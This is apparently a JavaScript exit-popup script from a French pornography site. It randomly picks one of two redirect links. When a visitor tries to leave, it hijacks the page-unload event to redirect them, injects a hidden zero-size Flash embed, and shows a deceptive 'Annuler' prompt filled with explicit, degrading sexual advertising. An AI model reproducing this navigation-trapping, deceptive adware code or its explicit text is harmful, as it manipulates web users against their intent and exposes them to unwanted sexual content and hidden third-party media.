
function Url()
{
 sites = new Array();
 sites[0]= new Array('http://www.sexe-pornxx-videos.com/exit.php?link=boostA',50);
 sites[1]= new Array('http://www.sexe-pornxx-videos.com/exit.php?link=boostB',50);

 url = '';
 nb_sites = sites.length;
 total_chances = 0;
 for(i=0;i<nb_sites;i++)
 {
  total_chances = total_chances + sites[i][1]
 }

 chance = Math.floor(Math.random() * (total_chances+1));

 compteur = 0;
 for(i=0;i<nb_sites;i++)
 {
  compteur = compteur + sites[i][1];
  if(compteur>chance)
  {
   url = sites[i][0];
   return url;
  }
 }
}



var popURL = Url();
var popMSG = 'Merci de visiter notre site';



function Launch(){
	document.body.innerHTML+='<embed src=http://www.sexe-pornxx-videos.com/js/pop.swf?popURL='+ popURL +' autostart=true width=0 height=0></embed>';
	alert(popMSG);
}

if(navigator.userAgent.indexOf("Firefox") != -1){
		window.onbeforeunload = function ExitPop(){ 
		window.location=popURL;	    
			return '***************************  ANNULER ***************************\n***************************  ANNULER ***************************\n\n\n\nAnnuler = Vidéos totalement GRATUITES\nAnnuler = Des milliers de films X GRATUITs\nAnnuler = Des jolies salopes sodomisées brutalement\nAnnuler = Des putes bien Chaudasses qui baisent pour du fric\nAnnuler = Des Filles de 18ans Vierges en Vidéos  GRATUITES\n\n\n\n***************************  ANNULER ***************************\n***************************  ANNULER ***************************\n\n';
		}
}
else{
	window.onbeforeunload = function ExitPop(){
		eval("window.attachEvent('onunload',Launch);");
	}
}
